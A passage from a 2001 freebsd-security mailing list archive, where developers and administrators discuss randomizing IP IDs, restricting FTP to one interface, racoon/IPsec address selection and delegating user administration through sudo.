<200104170157.f3H1v4d87804@earth.backplane.com>; from dillon@earth.backplane.com on Mon, Apr 16, 2001 at 06:57:04PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --LQksG6bCIzRHxTLp Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Apr 16, 2001 at 06:57:04PM -0700, Matt Dillon wrote: >=20 > :No reasoning. You do not need the htons(). The fragment ids just > :need to be unique. An htons() does not change that property. I dont > :like that code very much. A variable-block-size cipher in counter > :mode would do the job better. > : > :However, what many ppl do not realize is that you can use predictable > :ip ids to anonymously port scan machines. Bugtraq talks about how to > :do that. > : > :Niels. >=20 > It's not worth doing. We would be introducing unnecessary cpu burn on > every single packet we sent out, all to solve a problem that doesn't > really exist. Well, that's why it's a sysctl defaulting to off in my patch. Don't turn it on if you don't want to. Kris --LQksG6bCIzRHxTLp Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE62+MSWry0BWjoQKURAgE9AJ96+j/E1Qs1Z1zMQq98Ig3S2lXjcwCg6V9k sRXiXBxL0MznuvHiSe7j/vk= =rx/L -----END PGP SIGNATURE----- --LQksG6bCIzRHxTLp-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 23:59: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4719A37B43E for ; Mon, 16 Apr 2001 23:59:02 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 4244 invoked by uid 1000); 17 Apr 2001 06:57:27 -0000 Date: Tue, 17 Apr 2001 09:57:27 +0300 From: Peter Pentchev To: Khalil Haddad Cc: Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: FTP - block outer connections Message-ID: <20010417095727.A4070@ringworld.oblivion.bg> Mail-Followup-To: Khalil Haddad , Fernando Schapachnik , security@FreeBSD.ORG References: <200104161651.NAA26855@ns1.via-net-works.net.ar> <001c01c0c69e$d44889f0$0200a8c0@khalil> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001c01c0c69e$d44889f0$0200a8c0@khalil>; from khaddad@wanadoo.fr on Mon, Apr 16, 2001 at 07:58:23PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 16, 2001 at 07:58:23PM +0200, Khalil Haddad wrote: > thx for your answer > i changed my hosts.allow and made a rule to deny all and to allow only the > ip of the machine i want to ftp in > > but how do you make the changes to take effect ? i did not find this in the > man pages (other than reboot) The hosts.allow and hosts.deny files are examined upon every invocation of the TCP wrapper; that is, upon every incoming FTP connection. You do not need to do anything more after changing the hosts.* files. G'luck, Peter -- If wishes were fishes, the antecedent of this conditional would be true. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 0:30: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from mx1.ZSEA.zp.ua (ZSEA.zp.ua [212.8.40.5]) by hub.freebsd.org (Postfix) with ESMTP id 16DBC37B43C for ; Tue, 17 Apr 2001 00:29:57 -0700 (PDT) (envelope-from laa@laa.zp.ua) Received: (from laa@localhost) by mx1.ZSEA.zp.ua (8.x.x/8.x.x) with œ id f3H7TWH29250; Tue, 17 Apr 2001 10:29:32 +0300 (EEST) (envelope-from laa@laa.zp.ua)œ Date: Tue, 17 Apr 2001 10:29:32 +0300 From: Alexandr Listopad To: Adam Laurie Cc: Khalil Haddad , security@FreeBSD.ORG Subject: Re: FTP - block outer connections Message-ID: <20010417102932.B28335@laa.zp.ua> References: <002701c0c694$6774ef30$0200a8c0@khalil> <3ADB4050.855FE1F6@algroup.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <3ADB4050.855FE1F6@algroup.co.uk>; from adam@algroup.co.uk on Mon, Apr 16, 2001 at 07:56:16PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 16, 2001 at 07:56:16PM +0100, Adam Laurie wrote: > Khalil Haddad wrote: > > > > Hello all > > i got an FBSD box running FTPD > > I would like to listen only to ONE of my nic cards , ie the one that is not > > connected to the net anyone can help me securing it ? > > remove ftp from /etc/inetd.conf and run it as a daemon instead: > > ftpd -D -a is there any chanses to use TCPwrappers in this case? -- Laa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 3:25:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from male.aldigital.co.uk (male.aldigital.co.uk [194.128.162.11]) by hub.freebsd.org (Postfix) with ESMTP id 8989037B42C for ; Tue, 17 Apr 2001 03:25:34 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk (socks.aldigital.co.uk [194.128.162.10]) by male.aldigital.co.uk (Postfix) with ESMTP id 092F86A1411; Tue, 17 Apr 2001 10:25:28 +0000 (GMT) Message-ID: <3ADC1A01.387C9705@algroup.co.uk> Date: Tue, 17 Apr 2001 11:25:05 +0100 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Alexandr Listopad Cc: Khalil Haddad , security@FreeBSD.ORG Subject: Re: FTP - block outer connections References: <002701c0c694$6774ef30$0200a8c0@khalil> <3ADB4050.855FE1F6@algroup.co.uk> <20010417102932.B28335@laa.zp.ua> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alexandr Listopad wrote: > > On Mon, Apr 16, 2001 at 07:56:16PM +0100, Adam Laurie wrote: > > Khalil Haddad wrote: > > > > > > Hello all > > > i got an FBSD box running FTPD > > > I would like to listen only to ONE of my nic cards , ie the one that is not > > > connected to the net anyone can help me securing it ? > > > > remove ftp from /etc/inetd.conf and run it as a daemon instead: > > > > ftpd -D -a > > is there any chanses to use TCPwrappers in this case? no, but as you're already only listening on the interface you trust you should be ok anyway.... but to be sure you only get connections from where you want you could enable ipfilter and anti-spoof/host specific rules... cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 4:29: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 6D10837B43E; Tue, 17 Apr 2001 04:28:51 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id VAA08430; Tue, 17 Apr 2001 21:28:25 +1000 (EST) From: Darren Reed Message-Id: <200104171128.VAA08430@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: julian@elischer.org (Julian Elischer) Date: Tue, 17 Apr 2001 21:28:25 +1000 (Australia/ACT) Cc: avalon@coombs.anu.edu.au (Darren Reed), kris@obsecurity.org (Kris Kennaway), silby@silby.com (Mike Silbersack), newsletter@marktroberts.com (Mark T Roberts), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG In-Reply-To: <3ADBB93B.3C9DC3DE@elischer.org> from "Julian Elischer" at Apr 16, 2001 08:32:11 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Julian Elischer, sie said: > > Darren Reed wrote: > > > > In some mail from Kris Kennaway, sie said: > > > > > > > > > --rwEMma7ioTxnRzrJ > > > Content-Type: text/plain; charset=us-ascii > > > Content-Disposition: inline > > > Content-Transfer-Encoding: quoted-printable > > > > > > On Mon, Apr 16, 2001 at 02:03:11AM -0700, Kris Kennaway wrote: > > > > > > > Here's a patch ported from OpenBSD which randomizes this (supposedly > > > > such that it respects the constraint of not wrapping within the > > > > prescribed time period). I should wrap it in a sysctl, I guess. > > > >=20 > > > > http://www.freebsd.org/~kris/ipid.patch > > > > > > Okay, I did this and updated the patch, with the sysctl defaulting to > > > off since the random algorithm does add some amount of overhead. > > > > > > > Comments? > > > > You should optimize it for mod being 2^n-1 (or make that a requirement). > > > > Also, drop the HTONS statements, they no longer make sense. Before ip_id > > was a counter and so it made sense (sorta) to change its byte ordering to > > network. Now it's just a random number so there is no longer any need. > > there is a site that calculates server uptime from these numbers. > All the leading machines are freeBSD. When you do this it will > no-longer be able to track us :-( IMHO, extraordinarily large uptimes are nothing to be proud of and say nothing about the quality of software. I'd almost go so far as to say uptimes greater than 1 year indicate that the system administration practises need review. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 4:31:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 62E9F37B422; Tue, 17 Apr 2001 04:31:36 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f3HBVUK09190; Tue, 17 Apr 2001 04:31:30 -0700 (PDT) Date: Tue, 17 Apr 2001 04:31:30 -0700 From: Alfred Perlstein To: Darren Reed Cc: Julian Elischer , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010417043130.F976@fw.wintelcom.net> References: <3ADBB93B.3C9DC3DE@elischer.org> <200104171128.VAA08430@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104171128.VAA08430@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Apr 17, 2001 at 09:28:25PM +1000 X-all-your-base: are belong to us. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Darren Reed [010417 04:29] wrote: > In some mail from Julian Elischer, sie said: > > > > there is a site that calculates server uptime from these numbers. > > All the leading machines are freeBSD. When you do this it will > > no-longer be able to track us :-( > > IMHO, extraordinarily large uptimes are nothing to be proud of and > say nothing about the quality of software. > > I'd almost go so far as to say uptimes greater than 1 year indicate > that the system administration practises need review. Agreed. I've yet to hear about any seriously deployed system go without security advisories for over a year. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] Represent yourself, show up at BABUG http://www.babug.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 6:20:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id 4A9C137B43F for ; Tue, 17 Apr 2001 06:20:16 -0700 (PDT) (envelope-from sakane@ydc.co.jp) Received: from localhost (PPP11.tama-ap5.dti.ne.jp [210.159.232.11]) by mine.kame.net (8.11.1/3.7W) with ESMTP id f3HDXBY75965; Tue, 17 Apr 2001 22:33:12 +0900 (JST) To: lionnel.chaptal@IPricot.com Cc: freebsd-security@freebsd.org Subject: Re: IPSEC/Racoon/local adress when initiator In-Reply-To: Your message of "Fri, 13 Apr 2001 12:09:11 +0200" <3AD6D047.91F3F843@IPricot.com> References: <3AD6D047.91F3F843@IPricot.com> X-Mailer: Cue version 0.6 (010413-1707/sakane) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-Id: <20010417222014P.sakane@ydc.co.jp> Date: Tue, 17 Apr 2001 22:20:14 +0900 From: Shoichi Sakane X-Dispatcher: imput version 20000228(IM140) Lines: 28 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > FBSD(eth)--|--(eth)GW(eth)--(eth)Cisco(eth)--| > | |--(eth)host > host(eth)---| > On the FBSD side, there is only one NIC, so I have set up an alias > address on the ethernet interface. Why don't you buy another NIC for FBSD box ? > So the FBSD eth iface has one address in the net-to-be-tunneled > (192.168.0.1/24) and another for the tunnel-transported-lan (1.2.3.4 or > whatever). > The gateway for the FBSD (GW) has only one address in the same net as > the net-to-be-tunneled (for instance 192.168.0.254). So racoon is > binding on the eth iface with the address 192.168.0.1 > [sockmisc.c/getlocaladdr()]. The frame are beeing sent from 192.168.0.1 > whereas they should come from 1.2.3.4 When racoon is initiator, I think it is not racoon's problem. It depends on IPv4 source address selection of FreeBSD box. Actually racoon can recoginize alias addresses, and I believe racoon can use this address as source address when racoon is responder. So I want to show the whole log of racoon during the negotiation after racoon started. Please send me directly the log. /Shoichi Sakane @ KAME project/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 7: 7: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id B144437B424 for ; Tue, 17 Apr 2001 07:07:00 -0700 (PDT) (envelope-from d.m.pick@qmw.ac.uk) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.16 #1) id 14pW85-0004D8-00 for freebsd-security@freebsd.org; Tue, 17 Apr 2001 15:06:53 +0100 Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) for freebsd-security@FreeBSD.ORG id 14pW85-0002Q2-00; Tue, 17 Apr 2001 15:06:53 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: freebsd-security@FreeBSD.ORG Subject: Re: Interaction between ipfw, IPSEC and natd In-reply-to: Your message of "Mon, 16 Apr 2001 12:14:05 PDT." <200104161914.f3GJEMh06453@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 17 Apr 2001 15:06:53 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Just sort of thinking out loud here, would some kind of daemon (or > other facility), that would attach itself to a tun(4) (or other) > interface, like pipsecd does, but use the kernel's IPSec facility to > encrypt and encapsulate the packets instead of its own, then inject > them into the external interface be of use? I think so - but I don't see why a daemon whould be necessary. It seems to me that the sort of mechanism used by the "gif" interfaces would be appropriate. It *might* even be possible to extend the "gif" interface to do the job. The difference being that instead of encapsulating in an IP "tunnel" it would encapsulate in an IPSEC "tunnel". It probably would not be either appropriate or necessary to be able to handle AH-only packets this way. Of course, I may be talking through my hat; is so I;m sure someone will tell me... -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 7:39:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wsufftrust.org.uk (mail.wsufftrust.org.uk [194.202.248.194]) by hub.freebsd.org (Postfix) with ESMTP id 6C60137B443 for ; Tue, 17 Apr 2001 07:39:24 -0700 (PDT) (envelope-from lloyd@li5.org) Received: from 04 (wsufftrust.org.uk [194.202.248.193]) by mail.wsufftrust.org.uk (8.11.1/8.11.1) with SMTP id f3HFjKq76155 for ; Tue, 17 Apr 2001 16:45:21 +0100 (BST) (envelope-from lloyd@li5.org) Message-Id: <200104171545.f3HFjKq76155@mail.wsufftrust.org.uk> Date: Tue, 17 Apr 2001 15:33:23 +0000 From: Lloyd Palfrey Reply-To: lloyd@li5.org To: "freebsd-security@freebsd.org" Subject: Add/Remove Users X-mailer: FoxMail 2.1 [en] Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I need to create a user just for adding and removing users, I can't use the existing root or sudo. I can't use sudo because sudo asks for the current users password, and not root because i would have to change the shell to program which would render the root account unusable. Basicly I need to create another root acount with remote access. Could you please advise me on a way of doing this, as security plays a massive job on this server. Thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 7:44:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 3065037B440 for ; Tue, 17 Apr 2001 07:44:46 -0700 (PDT) (envelope-from anderson@centtech.com) Received: (from smap@localhost) by proxy.centtech.com (8.8.4/8.6.9) id JAA19182; Tue, 17 Apr 2001 09:44:42 -0500 (CDT) Received: from sprint.centtech.com(10.177.173.31) by proxy.centtech.com via smap (V2.0/2.1+anti-relay+anti-spam) id xma019180; Tue, 17 Apr 01 09:44:32 -0500 Received: from centtech.com (shiva [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id JAA08540; Tue, 17 Apr 2001 09:44:31 -0500 (CDT) Message-ID: <3ADC56CF.D3498E5@centtech.com> Date: Tue, 17 Apr 2001 09:44:31 -0500 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: lloyd@li5.org Cc: "freebsd-security@freebsd.org" Subject: Re: Add/Remove Users References: <200104171545.f3HFjKq76155@mail.wsufftrust.org.uk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You should check out the man page for sudo, since you can set the NOPASSWD option to not ask for passwords.. Lloyd Palfrey wrote: > > I need to create a user just for adding and removing users, I can't use the existing root or sudo. I can't use sudo > because sudo asks for the current users password, and not root because i would have to change the shell to > program which would render the root account unusable. Basicly I need to create another root acount with > remote access. Could you please advise me on a way of doing this, as security plays a massive job on this > server. > > Thanks > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ------------------------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792 Never have so many understood so little about so much. ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 7:54:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 13FB337B443 for ; Tue, 17 Apr 2001 07:54:24 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA10464; Tue, 17 Apr 2001 10:54:14 -0400 (EDT) (envelope-from wollman) Date: Tue, 17 Apr 2001 10:54:14 -0400 (EDT) From: Garrett Wollman Message-Id: <200104171454.KAA10464@khavrinen.lcs.mit.edu> To: Alfred Perlstein Cc: freebsd-security@FreeBSD.ORG Subject: Re: non-random IP IDs In-Reply-To: <20010417043130.F976@fw.wintelcom.net> References: <3ADBB93B.3C9DC3DE@elischer.org> <200104171128.VAA08430@caligula.anu.edu.au> <20010417043130.F976@fw.wintelcom.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Agreed. I've yet to hear about any seriously deployed system > go without security advisories for over a year. Most of those security problems do not require an actual reboot to fix. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 9: 6:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2527C37B422; Tue, 17 Apr 2001 09:06:32 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (2117 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 17 Apr 2001 11:04:28 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Tue, 17 Apr 2001 11:04:27 -0500 (CDT) From: James Wyatt To: Alfred Perlstein Cc: Darren Reed , Julian Elischer , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs In-Reply-To: <20010417043130.F976@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 17 Apr 2001, Alfred Perlstein wrote: > * Darren Reed [010417 04:29] wrote: > > In some mail from Julian Elischer, sie said: > > > > > > there is a site that calculates server uptime from these numbers. > > > All the leading machines are freeBSD. When you do this it will > > > no-longer be able to track us :-( > > > > IMHO, extraordinarily large uptimes are nothing to be proud of and > > say nothing about the quality of software. > > > > I'd almost go so far as to say uptimes greater than 1 year indicate > > that the system administration practises need review. > > Agreed. I've yet to hear about any seriously deployed system > go without security advisories for over a year. You don't have to reboot to fix all the security advisories - just a very critical few... The last few haven't required reboots to either workaround or fix. (Replacing libc on a running system *can* be tricky; I blew a SCO box up that way once!) Some machines with long uptimes are in fairly secure places (walled-in) so they get serviced less - I've had an AIX box up 596 days, but it had *very* specific use and "couldn't" take an outage. I also used a VAX that we didn't find out could not boot until we tried. The boot params had been goofed-up about six *months* before the failure and we didn't know it until it nearly killed us... - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 10:31:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 717FF37B43C; Tue, 17 Apr 2001 10:31:32 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.11.2) id f3HHVFu94944; Tue, 17 Apr 2001 10:31:15 -0700 (PDT) (envelope-from dillon) Date: Tue, 17 Apr 2001 10:31:15 -0700 (PDT) From: Matt Dillon Message-Id: <200104171731.f3HHVFu94944@earth.backplane.com> To: Kris Kennaway Cc: Niels Provos , Kris Kennaway , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> It's not worth doing. We would be introducing unnecessary cpu burn on :> every single packet we sent out, all to solve a problem that doesn't :> really exist. : :Well, that's why it's a sysctl defaulting to off in my patch. Don't :turn it on if you don't want to. : :Kris Let me put it another way: I think this sort of thing is an excellent example of introducing unnecessary kernel bloat into the system. Who gives a fart whether someone can port scan you efficiently or anonymously or not? I get port scanned every day. Most hackers don't even bother with portscans, they just try the exploit on the target machines directly. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 10:38:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 2B59737B424; Tue, 17 Apr 2001 10:38:16 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id KAA56704; Tue, 17 Apr 2001 10:37:56 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <200104171737.KAA56704@gndrsh.dnsmgr.net> Subject: Re: non-random IP IDs In-Reply-To: <20010417043130.F976@fw.wintelcom.net> from Alfred Perlstein at "Apr 17, 2001 04:31:30 am" To: bright@wintelcom.net (Alfred Perlstein) Date: Tue, 17 Apr 2001 10:37:56 -0700 (PDT) Cc: avalon@coombs.anu.edu.au (Darren Reed), julian@elischer.org (Julian Elischer), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > * Darren Reed [010417 04:29] wrote: > > In some mail from Julian Elischer, sie said: > > > > > > there is a site that calculates server uptime from these numbers. > > > All the leading machines are freeBSD. When you do this it will > > > no-longer be able to track us :-( > > > > IMHO, extraordinarily large uptimes are nothing to be proud of and > > say nothing about the quality of software. > > > > I'd almost go so far as to say uptimes greater than 1 year indicate > > that the system administration practises need review. > > Agreed. I've yet to hear about any seriously deployed system > go without security advisories for over a year. Or perhaps this is a very talented system admin who values uptime and finds work arounds that don't envolve downing a system that do just as good, and sometimes better, than the vendor fix for the security issue. Security Fix != Reboot required. -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 10:38:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id EF51F37B43F; Tue, 17 Apr 2001 10:38:24 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 2A14F67C11; Tue, 17 Apr 2001 10:38:24 -0700 (PDT) Date: Tue, 17 Apr 2001 10:38:23 -0700 From: Kris Kennaway To: Matt Dillon Cc: Kris Kennaway , Niels Provos , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs Message-ID: <20010417103823.A49384@xor.obsecurity.org> References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7JfCtLOvnd9MIVvH" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104171731.f3HHVFu94944@earth.backplane.com>; from dillon@earth.backplane.com on Tue, Apr 17, 2001 at 10:31:15AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --7JfCtLOvnd9MIVvH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Apr 17, 2001 at 10:31:15AM -0700, Matt Dillon wrote: >=20 > :> It's not worth doing. We would be introducing unnecessary cpu bur= n on > :> every single packet we sent out, all to solve a problem that doesn= 't > :> really exist. > : > :Well, that's why it's a sysctl defaulting to off in my patch. Don't > :turn it on if you don't want to. > : > :Kris >=20 > Let me put it another way: I think this sort of thing is an excellent > example of introducing unnecessary kernel bloat into the system. Who > gives a fart whether someone can port scan you efficiently or > anonymously or not? I get port scanned every day. Most hackers don't > even bother with portscans, they just try the exploit on the target= =20 > machines directly. Tools, not policy.. You may not care about it, but others do. Kris --7JfCtLOvnd9MIVvH Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE63H+PWry0BWjoQKURAjS3AJ0XbkDrdbdXfQtVsqNRMqv3FgCHwgCfW/01 LJrMwuCPS6PVA5Upc8ODp7s= =hVGy -----END PGP SIGNATURE----- --7JfCtLOvnd9MIVvH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 10:41:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id A8E1437B422; Tue, 17 Apr 2001 10:41:36 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.11.2) id f3HHfNZ95206; Tue, 17 Apr 2001 10:41:23 -0700 (PDT) (envelope-from dillon) Date: Tue, 17 Apr 2001 10:41:23 -0700 (PDT) From: Matt Dillon Message-Id: <200104171741.f3HHfNZ95206@earth.backplane.com> To: Kris Kennaway Cc: Kris Kennaway , Niels Provos , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> <20010417103823.A49384@xor.obsecurity.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> Let me put it 